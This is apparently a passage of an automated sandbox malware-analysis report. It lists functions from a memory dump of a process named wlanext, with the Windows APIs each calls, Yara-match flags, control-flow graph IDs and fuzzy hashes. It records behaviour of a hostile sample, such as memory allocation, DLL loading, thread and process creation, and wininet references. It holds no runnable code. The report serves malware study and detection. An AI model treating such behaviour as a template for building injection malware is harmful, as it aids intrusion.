                    Uniqueness Score: -1.00%

                    Function 00A1A540 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                    Download Yara Rule
                    APIs
                    • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00A02D11,00002000,00003000,00000004), ref: 00A1A579
                    Memory Dump Source
                    • Source File: 0000000B.00000002.634911519.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_a00000_wlanext.jbxd
                    Yara matches
                    Similarity
                    • API ID: AllocateMemoryVirtual
                    • String ID:
                    • API String ID: 2167126740-0
                    • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                    • Instruction ID: a30241cbdee407b02d390c14a1c11de8f76035c23d319dcf8f376c846aa7f2b8
                    • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                    • Instruction Fuzzy Hash: DBF015B2200208ABCB14DF89CC81EEB77ADEF88754F118148BE0C97241C630F811CBA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00A1A490 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                    Download Yara Rule
                    APIs
                    • NtClose.NTDLL(00A14D50,?,?,00A14D50,00000000,FFFFFFFF), ref: 00A1A4B5
                    Memory Dump Source
                    • Source File: 0000000B.00000002.634911519.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_a00000_wlanext.jbxd
                    Yara matches
                    Similarity
                    • API ID: Close
                    • String ID:
                    • API String ID: 3535843008-0
                    • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                    • Instruction ID: b18e793cadc1f723a427b7eb653957b4035c16ab2a8490b329c6269b9b632a97
                    • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                    • Instruction Fuzzy Hash: DCD01776200218ABD710EB98CC85EE77BACEF48B60F158499BA1C9B242C530FA0086E0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 03369710 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 0000000B.00000002.636937480.0000000003300000.00000040.00000800.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                    • Associated: 0000000B.00000002.637412884.000000000341B000.00000040.00000800.00020000.00000000.sdmpDownload File
                    • Associated: 0000000B.00000002.637445370.000000000341F000.00000040.00000800.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_3300000_wlanext.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: eafd2190f740d1de6d8cb9c4df04178bbfc9304fd42abd1456c8752b91437781
                    • Instruction ID: da0d0fdff40a95b46cd5da198538217279d2c9c1e9122178299b604815be0e2d
                    • Opcode Fuzzy Hash: eafd2190f740d1de6d8cb9c4df04178bbfc9304fd42abd1456c8752b91437781
                    • Instruction Fuzzy Hash: F190027521104902E110A599544864600059BE0341F51D021A5015555EC7A988917171
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 03369780 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 0000000B.00000002.636937480.0000000003300000.00000040.00000800.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                    • Associated: 0000000B.00000002.637412884.000000000341B000.00000040.00000800.00020000.00000000.sdmpDownload File
                    • Associated: 0000000B.00000002.637445370.000000000341F000.00000040.00000800.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_3300000_wlanext.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 68596cbc36d5701013fd36cf3b73d5b40afd98cb054479563db2282748efb432
                    • Instruction ID: d701e37927c109bec25c96237d27a428c1a51337817044c1f8969ca781ffbe98
                    • Opcode Fuzzy Hash: 68596cbc36d5701013fd36cf3b73d5b40afd98cb054479563db2282748efb432
                    • Instruction Fuzzy Hash: BE90026D22304502E190B159544860A00059BD1242F91D425A0006558CCA5988696361
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 03369FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 0000000B.00000002.636937480.0000000003300000.00000040.00000800.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                    • Associated: 0000000B.00000002.637412884.000000000341B000.00000040.00000800.00020000.00000000.sdmpDownload File
                    • Associated: 0000000B.00000002.637445370.000000000341F000.00000040.00000800.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_3300000_wlanext.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: ee6737c179cd50ddbdf8b4103b246a9f38a356c03f74b1cb3133dc2b1a9868f3
                    • Instruction ID: 5e5002767a8a6c3637724afd1e1d154168148d53352c888836b8b325c03dc306
                    • Opcode Fuzzy Hash: ee6737c179cd50ddbdf8b4103b246a9f38a356c03f74b1cb3133dc2b1a9868f3
                    • Instruction Fuzzy Hash: 8790027532118902E120A159844470600059BD1241F51C421A0815558D87D988917162
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 03369660 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 0000000B.00000002.636937480.0000000003300000.00000040.00000800.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                    • Associated: 0000000B.00000002.637412884.000000000341B000.00000040.00000800.00020000.00000000.sdmpDownload File
                    • Associated: 0000000B.00000002.637445370.000000000341F000.00000040.00000800.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_3300000_wlanext.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 709c12bdf44a5627421d10907b2899dcc062f003c6dd7ba152494a2b663f37b6
                    • Instruction ID: 7fce38b73787ad0b26bcd51b7b68cc8ebf3fc9d18b0443625bfcc6ecc0f0a72b
                    • Opcode Fuzzy Hash: 709c12bdf44a5627421d10907b2899dcc062f003c6dd7ba152494a2b663f37b6
                    • Instruction Fuzzy Hash: DC90027521104D02E190B159444464A00059BD1341F91C025A0016654DCB598A5977E1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 03369650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 0000000B.00000002.636937480.0000000003300000.00000040.00000800.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                    • Associated: 0000000B.00000002.637412884.000000000341B000.00000040.00000800.00020000.00000000.sdmpDownload File
                    • Associated: 0000000B.00000002.637445370.000000000341F000.00000040.00000800.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_3300000_wlanext.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 7a486a098a9cb238ce737db90086e42106ab030d89e39155311236a91b52fcb5
                    • Instruction ID: 04397e40828c19f348513e5b8cbb2a913de6879def685d040b92fa6b97ada45c
                    • Opcode Fuzzy Hash: 7a486a098a9cb238ce737db90086e42106ab030d89e39155311236a91b52fcb5
                    • Instruction Fuzzy Hash: CA90027521508D42E150B1594444A4600159BD0345F51C021A0055694D97698D55B6A1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 03369A50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 0000000B.00000002.636937480.0000000003300000.00000040.00000800.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                    • Associated: 0000000B.00000002.637412884.000000000341B000.00000040.00000800.00020000.00000000.sdmpDownload File
                    • Associated: 0000000B.00000002.637445370.000000000341F000.00000040.00000800.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_3300000_wlanext.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: fff69f6fa539cff5d0feebae5604254c532e45b6e9348d0936efa520bb9726c8
                    • Instruction ID: a65b74df553915a48cfebfafd67ea16ea8e8ea2fb8919ea23b0c8262757383b1
                    • Opcode Fuzzy Hash: fff69f6fa539cff5d0feebae5604254c532e45b6e9348d0936efa520bb9726c8
                    • Instruction Fuzzy Hash: D390026522184542E210A5694C54B0700059BD0343F51C125A0145554CCA5988616561
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 033696E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 0000000B.00000002.636937480.0000000003300000.00000040.00000800.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                    • Associated: 0000000B.00000002.637412884.000000000341B000.00000040.00000800.00020000.00000000.sdmpDownload File
                    • Associated: 0000000B.00000002.637445370.000000000341F000.00000040.00000800.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_3300000_wlanext.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 55394d89da26d6b048e47e44b938f1e4c09f3b2d542679167cd88bc5177096b6
                    • Instruction ID: 4ef5c320124e93670b5e5dfe03651aeef8c47e06637cace7cb5fa95d75397690
                    • Opcode Fuzzy Hash: 55394d89da26d6b048e47e44b938f1e4c09f3b2d542679167cd88bc5177096b6
                    • Instruction Fuzzy Hash: 259002752110CD02E120A159844474A00059BD0341F55C421A4415658D87D988917161
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 033696D0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 0000000B.00000002.636937480.0000000003300000.00000040.00000800.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                    • Associated: 0000000B.00000002.637412884.000000000341B000.00000040.00000800.00020000.00000000.sdmpDownload File
                    • Associated: 0000000B.00000002.637445370.000000000341F000.00000040.00000800.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_3300000_wlanext.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: ab2c21ca3e8abd730b7ba419f1bd695bede07637e4c3ab78cbd838b6b77abf7b
                    • Instruction ID: 74a998b731eef175871c2e264360c97644abc4e36d97bac2dae4c163ae7a4f2f
                    • Opcode Fuzzy Hash: ab2c21ca3e8abd730b7ba419f1bd695bede07637e4c3ab78cbd838b6b77abf7b
                    • Instruction Fuzzy Hash: 2F90027521104D42E110A1594444B4600059BE0341F51C026A0115654D8759C8517561
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 03369910 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 0000000B.00000002.636937480.0000000003300000.00000040.00000800.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                    • Associated: 0000000B.00000002.637412884.000000000341B000.00000040.00000800.00020000.00000000.sdmpDownload File
                    • Associated: 0000000B.00000002.637445370.000000000341F000.00000040.00000800.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_3300000_wlanext.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 773c299fd45c59546582445f156cb5b341ad7355d8584eb65a8236abea791e37
                    • Instruction ID: 65a846633c44f580f4b8aeda02402b27b55e0fb66534410f0b694a60eb855fa4
                    • Opcode Fuzzy Hash: 773c299fd45c59546582445f156cb5b341ad7355d8584eb65a8236abea791e37
                    • Instruction Fuzzy Hash: E19002B521104902E150B159444474600059BD0341F51C021A5055554E879D8DD576A5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 03369540 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 0000000B.00000002.636937480.0000000003300000.00000040.00000800.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                    • Associated: 0000000B.00000002.637412884.000000000341B000.00000040.00000800.00020000.00000000.sdmpDownload File
                    • Associated: 0000000B.00000002.637445370.000000000341F000.00000040.00000800.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_3300000_wlanext.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 7366cf7b1bb06460e63ca4c667440a68f9e6c7a7a6586fe61edf99844569f787
                    • Instruction ID: 3aec7d1f6abad5f1a9a4890b25696416d76de7a4f6ebfceadbdba06174279ce4
                    • Opcode Fuzzy Hash: 7366cf7b1bb06460e63ca4c667440a68f9e6c7a7a6586fe61edf99844569f787
                    • Instruction Fuzzy Hash: CC90047D331045031115F55D07445070047DFD53D1351C031F1007550CD775CC717171
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 033699A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 0000000B.00000002.636937480.0000000003300000.00000040.00000800.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                    • Associated: 0000000B.00000002.637412884.000000000341B000.00000040.00000800.00020000.00000000.sdmpDownload File
                    • Associated: 0000000B.00000002.637445370.000000000341F000.00000040.00000800.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_3300000_wlanext.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 2259bcd1cbe0cf87c2746fbb0de42540321ff7203be6b278b77e9f767568869e
                    • Instruction ID: bbef85932221fb65e86215c85bc4bb808809b7fcb5ed10fe583bcfd3b72f9879
                    • Opcode Fuzzy Hash: 2259bcd1cbe0cf87c2746fbb0de42540321ff7203be6b278b77e9f767568869e
                    • Instruction Fuzzy Hash: 5E9002A535104942E110A1594454B060005DBE1341F51C025E1055554D875DCC527166
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 033695D0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 0000000B.00000002.636937480.0000000003300000.00000040.00000800.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                    • Associated: 0000000B.00000002.637412884.000000000341B000.00000040.00000800.00020000.00000000.sdmpDownload File
                    • Associated: 0000000B.00000002.637445370.000000000341F000.00000040.00000800.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_3300000_wlanext.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 45b0e5102c754e550ff6c113c0d64c767260180ac76106c70657cdbeffc0da12
                    • Instruction ID: 5488dc7b1e991147ea6c8245c5b0f86d3cda5f52765ff0f95cc2d8b91d41c840
                    • Opcode Fuzzy Hash: 45b0e5102c754e550ff6c113c0d64c767260180ac76106c70657cdbeffc0da12
                    • Instruction Fuzzy Hash: 9E9002A5212045035115B1594454616400A9BE0241B51C031E1005590DC66988917165
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 03369860 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 0000000B.00000002.636937480.0000000003300000.00000040.00000800.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                    • Associated: 0000000B.00000002.637412884.000000000341B000.00000040.00000800.00020000.00000000.sdmpDownload File
                    • Associated: 0000000B.00000002.637445370.000000000341F000.00000040.00000800.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_3300000_wlanext.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 9b3bc06bfcc719c8c276e5e47d44e391de3e9f1e586d15c119deb7577d216194
                    • Instruction ID: 5e9e99d9a43ef368fa1b35471b4d7a186465afce851d758ba3f2bc9f7f02001a
                    • Opcode Fuzzy Hash: 9b3bc06bfcc719c8c276e5e47d44e391de3e9f1e586d15c119deb7577d216194
                    • Instruction Fuzzy Hash: EC90027521104913E121A159454470700099BD0281F91C422A0415558D979A8952B161
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 03369840 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 0000000B.00000002.636937480.0000000003300000.00000040.00000800.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                    • Associated: 0000000B.00000002.637412884.000000000341B000.00000040.00000800.00020000.00000000.sdmpDownload File
                    • Associated: 0000000B.00000002.637445370.000000000341F000.00000040.00000800.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_3300000_wlanext.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: b767f2040277ba61be8a731cc75f1a6f995705f1423bc1d6518ac823d74f3dc4
                    • Instruction ID: 119d2ce9d1b5a0ae70750a54c4122c4947935ac39cb4ead079cb0f9caca9a30e
                    • Opcode Fuzzy Hash: b767f2040277ba61be8a731cc75f1a6f995705f1423bc1d6518ac823d74f3dc4
                    • Instruction Fuzzy Hash: F4900265252086526555F15944445074006ABE0281791C022A1405950C866A9856E661
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00A19080 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 243 a19080-a190c2 call a1bd40 246 a190c8-a19118 call a1be10 call a0acf0 call a14e50 243->246 247 a1919c-a191a2 243->247 254 a19120-a19131 Sleep 246->254 255 a19133-a19139 254->255 256 a19196-a1919a 254->256 257 a19163-a19184 call a18eb0 255->257 258 a1913b-a19161 call a18ca0 255->258 256->247 256->254 262 a19189-a1918c 257->262 258->262 262->256
                    APIs
                    • Sleep.KERNELBASE(000007D0), ref: 00A19128
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.634911519.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_a00000_wlanext.jbxd
                    Yara matches
                    Similarity
                    • API ID: Sleep
                    • String ID: net.dll$wininet.dll
                    • API String ID: 3472027048-1269752229
                    • Opcode ID: 7a610f761d0da1d75e76726c77c53804720eb4ac1e2d24cbc414290cef663861
                    • Instruction ID: 24150db63e1a894a091d7c1fa48b504e538655ea0411c77c134571e37a17466b
                    • Opcode Fuzzy Hash: 7a610f761d0da1d75e76726c77c53804720eb4ac1e2d24cbc414290cef663861
                    • Instruction Fuzzy Hash: 6B3190B2900745BBC724DF64C885FA7B7B9FB48B00F10851DF62A5B245DB34B690CBA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00A19076 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 80sleepCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 263 a19076-a190af 264 a190bb-a190c2 263->264 265 a190b6 call a1bd40 263->265 266 a190c8-a19118 call a1be10 call a0acf0 call a14e50 264->266 267 a1919c-a191a2 264->267 265->264 274 a19120-a19131 Sleep 266->274 275 a19133-a19139 274->275 276 a19196-a1919a 274->276 277 a19163-a19184 call a18eb0 275->277 278 a1913b-a19161 call a18ca0 275->278 276->267 276->274 282 a19189-a1918c 277->282 278->282 282->276
                    APIs
                    • Sleep.KERNELBASE(000007D0), ref: 00A19128
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.634911519.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_a00000_wlanext.jbxd
                    Yara matches
                    Similarity
                    • API ID: Sleep
                    • String ID: net.dll$wininet.dll
                    • API String ID: 3472027048-1269752229
                    • Opcode ID: d6355853e6332a844b8262cb2b3490841c70380b4e5669fa948a938caf3cf782
                    • Instruction ID: 9978212eaca009e4ff5acbc13afdf033d43e762e1187f14d1f59e75d790efbe9
                    • Opcode Fuzzy Hash: d6355853e6332a844b8262cb2b3490841c70380b4e5669fa948a938caf3cf782
                    • Instruction Fuzzy Hash: BB21E1B2A00341BBC714DF64D885FA7B7B9FB48B00F14811DFA2D5B285D774A990CBA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00A1A670 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 289 a1a670-a1a6a1 call a1af60 RtlFreeHeap
                    APIs
                    • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00A03AF8), ref: 00A1A69D
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.634911519.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_a00000_wlanext.jbxd
                    Yara matches
                    Similarity
                    • API ID: FreeHeap
                    • String ID: .z`
                    • API String ID: 3298025750-1441809116
                    • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                    • Instruction ID: db78734c87f0c72dd3d6bf3e51c9605b26e92ac1163643a57b7801f66fd8b1b4
                    • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                    • Instruction Fuzzy Hash: FEE012B1200208ABDB18EF99CC49EA777ACEF88760F118558BA0C5B242C630E9108AB0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00A08310 Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                    • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 00A0836A
                    • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 00A0838B
                    Memory Dump Source
                    • Source File: 0000000B.00000002.634911519.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_a00000_wlanext.jbxd
                    Yara matches
                    Similarity
                    • API ID: MessagePostThread
                    • String ID:
                    • API String ID: 1836367815-0
                    • Opcode ID: a493eabf7697513180435b5f665ed638a4e8f6b3857f93d23393bef0d0da5e70
                    • Instruction ID: 135888bf08edae2b02f500a48ce1b76fca475aa25e81063837b8bf7575a90571
                    • Opcode Fuzzy Hash: a493eabf7697513180435b5f665ed638a4e8f6b3857f93d23393bef0d0da5e70
                    • Instruction Fuzzy Hash: D001A231A8032C7BE721A694AD43FFE776C6B40F50F050118FF04BA1C2EAE4690646F6
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00A0ACF0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 502 a0acf0-a0ad0c 503 a0ad14-a0ad19 502->503 504 a0ad0f call a1cc50 502->504 505 a0ad1b-a0ad1e 503->505 506 a0ad1f-a0ad2d call a1d070 503->506 504->503 509 a0ad3d-a0ad4e call a1b4a0 506->509 510 a0ad2f-a0ad3a call a1d2f0 506->510 515 a0ad50-a0ad64 LdrLoadDll 509->515 516 a0ad67-a0ad6a 509->516 510->509 515->516
                    APIs
                    • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00A0AD62
                    Memory Dump Source
                    • Source File: 0000000B.00000002.634911519.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_a00000_wlanext.jbxd
                    Yara matches
                    Similarity
                    • API ID: Load
                    • String ID:
                    • API String ID: 2234796835-0
                    • Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                    • Instruction ID: 8e56fa12db5c26b06e3d91965189348131cb8a969c5533cbf8c5db4d7bf46206
                    • Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                    • Instruction Fuzzy Hash: 2E011EB5E4020DBBDF10DBA4ED42FDDB3789B54309F004595A90997681F631EB548B91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00A1A6E0 Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 517 a1a6e0-a1a738 call a1af60 CreateProcessInternalW
                    APIs
                    • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00A1A734
                    Memory Dump Source
                    • Source File: 0000000B.00000002.634911519.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_a00000_wlanext.jbxd
                    Yara matches
                    Similarity
                    • API ID: CreateInternalProcess
                    • String ID:
                    • API String ID: 2186235152-0
                    • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                    • Instruction ID: 9bdd2d156fd9a2d38df65845a8e3331a1b56b82c45ca31130e6f2f6a5ee8bd95
                    • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                    • Instruction Fuzzy Hash: 7D01B2B2210108BFCB54DF89DC80EEB77ADAF8C754F158258FA0D97241C630E851CBA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00A191B0 Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 523 a191b0-a191d8 call a14e50 526 a191f7-a191fc 523->526 527 a191da-a191f6 call a1f222 CreateThread 523->527
                    APIs
                    • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,00A0F050,?,?,00000000), ref: 00A191EC
                    Memory Dump Source
                    • Source File: 0000000B.00000002.634911519.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_a00000_wlanext.jbxd
                    Yara matches
                    Similarity
                    • API ID: CreateThread
                    • String ID:
                    • API String ID: 2422867632-0
                    • Opcode ID: ecacb28e533d931049fcac73acfce2faf05e3b67876ae05ce95fa90aefa457bb
                    • Instruction ID: 4844faffca714121e06033bf2d338455ef9bb3006a5a8712124df29a48401b8e
                    • Opcode Fuzzy Hash: ecacb28e533d931049fcac73acfce2faf05e3b67876ae05ce95fa90aefa457bb
                    • Instruction Fuzzy Hash: 3BE092773803043AE330659DAC03FE7B39CDB81B20F140026FA0DEB2C1D995F84142A4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00A1A7C3 Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                    Download Yara Rule
                    APIs
                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,00A0F1D2,00A0F1D2,?,00000000,?,?), ref: 00A1A800
                    Memory Dump Source
                    • Source File: 0000000B.00000002.634911519.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_a00000_wlanext.jbxd
                    Yara matches
                    Similarity
                    • API ID: LookupPrivilegeValue
                    • String ID:
                    • API String ID: 3899507212-0
                    • Opcode ID: 982118f89f9998f9fc20f095bb05f6a09ef34c276847c105a409ef0d5cfb2817
                    • Instruction ID: eeeba9f244056b43d3d5136dd7d38df65c89a665670bebea2105f4bd4a833b32
                    • Opcode Fuzzy Hash: 982118f89f9998f9fc20f095bb05f6a09ef34c276847c105a409ef0d5cfb2817
                    • Instruction Fuzzy Hash: 43E092B16002147BDB10DF88CC85EE73BAADF48250F108564FD0CA7751C575E8158BF1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00A1A630 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                    Download Yara Rule
                    APIs
